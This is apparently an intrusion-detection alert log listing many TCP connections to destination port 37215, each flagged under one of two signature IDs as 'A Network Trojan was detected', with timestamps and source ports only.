          Timestamp:05/28/24-14:47:44.927746
          SID:2829579
          Source Port:39476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464060
          SID:2829579
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892648
          SID:2829579
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892929
          SID:2835222
          Source Port:45458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237068
          SID:2835222
          Source Port:60546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873584
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528867
          SID:2829579
          Source Port:46202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178983
          SID:2835222
          Source Port:58530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271862
          SID:2829579
          Source Port:38026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.282029
          SID:2835222
          Source Port:60500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921192
          SID:2835222
          Source Port:36882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592971
          SID:2835222
          Source Port:47886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245609
          SID:2835222
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938403
          SID:2829579
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684694
          SID:2835222
          Source Port:40926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961627
          SID:2829579
          Source Port:45448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794098
          SID:2835222
          Source Port:33618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976803
          SID:2829579
          Source Port:58568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711311
          SID:2835222
          Source Port:55874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864166
          SID:2829579
          Source Port:59354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142546
          SID:2829579
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663870
          SID:2829579
          Source Port:44494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207007
          SID:2835222
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885946
          SID:2829579
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793293
          SID:2835222
          Source Port:52722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269835
          SID:2829579
          Source Port:38124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235408
          SID:2835222
          Source Port:55550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266530
          SID:2835222
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756777
          SID:2829579
          Source Port:35102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156224
          SID:2835222
          Source Port:50726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403246
          SID:2835222
          Source Port:53126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019681
          SID:2835222
          Source Port:48540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266648
          SID:2835222
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842840
          SID:2835222
          Source Port:40184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770992
          SID:2835222
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803850
          SID:2835222
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213726
          SID:2829579
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550507
          SID:2829579
          Source Port:57596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272413
          SID:2829579
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635628
          SID:2829579
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112945
          SID:2835222
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293126
          SID:2835222
          Source Port:52444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820875
          SID:2835222
          Source Port:44038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.823247
          SID:2829579
          Source Port:35406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704072
          SID:2829579
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287571
          SID:2835222
          Source Port:45476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963976
          SID:2829579
          Source Port:34002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228799
          SID:2829579
          Source Port:56696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671954
          SID:2829579
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268559
          SID:2829579
          Source Port:34318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405322
          SID:2835222
          Source Port:51136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809026
          SID:2835222
          Source Port:35964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322048
          SID:2835222
          Source Port:46316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.363494
          SID:2829579
          Source Port:46958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874109
          SID:2829579
          Source Port:59392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560462
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878361
          SID:2829579
          Source Port:46664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070457
          SID:2829579
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530087
          SID:2829579
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892913
          SID:2829579
          Source Port:35760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770661
          SID:2835222
          Source Port:37328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283683
          SID:2829579
          Source Port:39368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298956
          SID:2835222
          Source Port:57798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079520
          SID:2835222
          Source Port:34602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594493
          SID:2829579
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126741
          SID:2829579
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270329
          SID:2829579
          Source Port:55782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868753
          SID:2835222
          Source Port:44822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815505
          SID:2829579
          Source Port:38756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.270979
          SID:2829579
          Source Port:38524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983701
          SID:2829579
          Source Port:36492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542164
          SID:2835222
          Source Port:35502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485481
          SID:2829579
          Source Port:47718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597642
          SID:2829579
          Source Port:48882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222410
          SID:2829579
          Source Port:38066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813324
          SID:2835222
          Source Port:59340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868566
          SID:2835222
          Source Port:60004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107354
          SID:2835222
          Source Port:40912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978880
          SID:2829579
          Source Port:38188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414765
          SID:2829579
          Source Port:33476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859749
          SID:2829579
          Source Port:48420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176429
          SID:2829579
          Source Port:47442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.040267
          SID:2835222
          Source Port:46066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176413
          SID:2829579
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815865
          SID:2829579
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601389
          SID:2835222
          Source Port:33370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889177
          SID:2835222
          Source Port:55806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893366
          SID:2835222
          Source Port:56536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.074980
          SID:2829579
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473602
          SID:2829579
          Source Port:39152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156071
          SID:2829579
          Source Port:52962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652474
          SID:2829579
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301328
          SID:2835222
          Source Port:60364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112793
          SID:2829579
          Source Port:57376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734401
          SID:2829579
          Source Port:33738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182760
          SID:2835222
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603046
          SID:2829579
          Source Port:45184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477983
          SID:2829579
          Source Port:44068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301202
          SID:2835222
          Source Port:45384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.176420
          SID:2829579
          Source Port:43020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890085
          SID:2835222
          Source Port:50142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805005
          SID:2835222
          Source Port:58676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656607
          SID:2835222
          Source Port:43988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931895
          SID:2835222
          Source Port:42224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093555
          SID:2835222
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355820
          SID:2829579
          Source Port:54760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.556763
          SID:2829579
          Source Port:57970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960639
          SID:2835222
          Source Port:42536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239320
          SID:2829579
          Source Port:37028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852154
          SID:2835222
          Source Port:38304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213295
          SID:2829579
          Source Port:40790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497838
          SID:2835222
          Source Port:43590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048797
          SID:2835222
          Source Port:36232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511287
          SID:2829579
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760264
          SID:2835222
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763742
          SID:2829579
          Source Port:55076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356741
          SID:2835222
          Source Port:58560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240248
          SID:2835222
          Source Port:50200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894094
          SID:2835222
          Source Port:45078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208285
          SID:2829579
          Source Port:44374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215928
          SID:2835222
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326078
          SID:2829579
          Source Port:37802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299424
          SID:2835222
          Source Port:53502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512660
          SID:2829579
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296072
          SID:2829579
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214092
          SID:2829579
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594379
          SID:2829579
          Source Port:57992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.284972
          SID:2829579
          Source Port:44152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.238148
          SID:2829579
          Source Port:33162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357199
          SID:2835222
          Source Port:36334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796458
          SID:2829579
          Source Port:55324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269489
          SID:2829579
          Source Port:54460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498807
          SID:2829579
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772780
          SID:2829579
          Source Port:51720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228190
          SID:2835222
          Source Port:52932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690068
          SID:2829579
          Source Port:55810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778196
          SID:2829579
          Source Port:34640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778407
          SID:2829579
          Source Port:47594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597748
          SID:2829579
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399195
          SID:2829579
          Source Port:55706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766474
          SID:2835222
          Source Port:49872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338707
          SID:2835222
          Source Port:46858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266258
          SID:2835222
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939340
          SID:2829579
          Source Port:39356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550352
          SID:2835222
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2835222
          Source Port:38698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325292
          SID:2835222
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311114
          SID:2835222
          Source Port:33634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249090
          SID:2829579
          Source Port:60712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943295
          SID:2829579
          Source Port:35686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821854
          SID:2829579
          Source Port:42860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195919
          SID:2835222
          Source Port:60756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709299
          SID:2835222
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635891
          SID:2829579
          Source Port:52764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978238
          SID:2829579
          Source Port:57514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959664
          SID:2835222
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766143
          SID:2835222
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138101
          SID:2829579
          Source Port:53202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804860
          SID:2829579
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102281
          SID:2835222
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177283
          SID:2835222
          Source Port:43148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708521
          SID:2829579
          Source Port:39548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864136
          SID:2829579
          Source Port:41466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542672
          SID:2835222
          Source Port:38804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543543
          SID:2835222
          Source Port:45146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892914
          SID:2829579
          Source Port:52744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152824
          SID:2829579
          Source Port:57070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923731
          SID:2835222
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473653
          SID:2829579
          Source Port:43274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927690
          SID:2835222
          Source Port:44480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813236
          SID:2829579
          Source Port:57364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977944
          SID:2835222
          Source Port:56714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907966
          SID:2829579
          Source Port:60840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201171
          SID:2835222
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739684
          SID:2829579
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669468
          SID:2835222
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813067
          SID:2829579
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626682
          SID:2835222
          Source Port:53304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093211
          SID:2829579
          Source Port:48206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770742
          SID:2829579
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876971
          SID:2829579
          Source Port:38222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480342
          SID:2829579
          Source Port:56468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338091
          SID:2829579
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628453
          SID:2835222
          Source Port:35628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217151
          SID:2829579
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402368
          SID:2829579
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975952
          SID:2829579
          Source Port:33382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269736
          SID:2835222
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998368
          SID:2835222
          Source Port:43856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150866
          SID:2835222
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351094
          SID:2829579
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085364
          SID:2829579
          Source Port:36796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273248
          SID:2835222
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760091
          SID:2829579
          Source Port:41032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932175
          SID:2829579
          Source Port:55622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536685
          SID:2829579
          Source Port:49288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.285232
          SID:2829579
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287318
